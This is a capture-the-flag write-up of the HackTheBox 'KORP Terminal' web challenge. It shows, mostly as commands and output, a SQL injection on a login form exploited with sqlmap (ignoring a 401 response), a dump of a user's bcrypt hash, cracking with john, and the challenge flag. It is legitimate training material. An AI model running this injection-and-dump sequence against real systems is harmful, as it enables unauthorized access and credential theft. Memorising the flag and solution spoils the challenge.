Rating:

# KORP Terminal

## Video Walkthrough

[![VIDEO](https://img.youtube.com/vi/-vhl8ixthO4/0.jpg)](https://www.youtube.com/watch?v=-vhl8ixthO4?t=375 "HackTheBox Cyber Apocalypse '24: KORP Terminal (web)")

## Description

> Your faction must infiltrate the KORP™ terminal and gain access to the Legionaries' privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.

## Solution

Greeted by a login page. If we send single quotes in username/password box it triggers a MySQL error!

Tried SQLMap but it fails due to `401: Unauthorized`.

Luckily, we can just ignore that HTTP code.

```bash
sqlmap -r new.req --batch --ignore-code 401

[INFO] POST parameter 'username' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
```

Find the databases.

```bash
sqlmap -r new.req --batch --ignore-code 401 --dbs

available databases [3]:
[*] information_schema
[*] korp_terminal
[*] test
```

Then the tables.

```bash
sqlmap -r new.req --batch --ignore-code 401 -D korp_terminal --tables

+-------+
| users |
+-------+
```

Dump the passwords.

```bash
sqlmap -r new.req --batch --ignore-code 401 -D korp_terminal -T users -C password --dump

+--------------------------------------------------------------+
| password |
+--------------------------------------------------------------+
| $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. |
+--------------------------------------------------------------+
```

Crack the `bcrypt` hash with `john`.

```bash
john hash --wordlist=$rockyou

password123
```

Log in to the app and receive the flag.

```bash
admin:password123
```

Flag: `HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}`

Original writeup (https://crypto-cat.gitbook.io/ctf-writeups/2024/cyber_apocalypse_24/web/korp_terminal).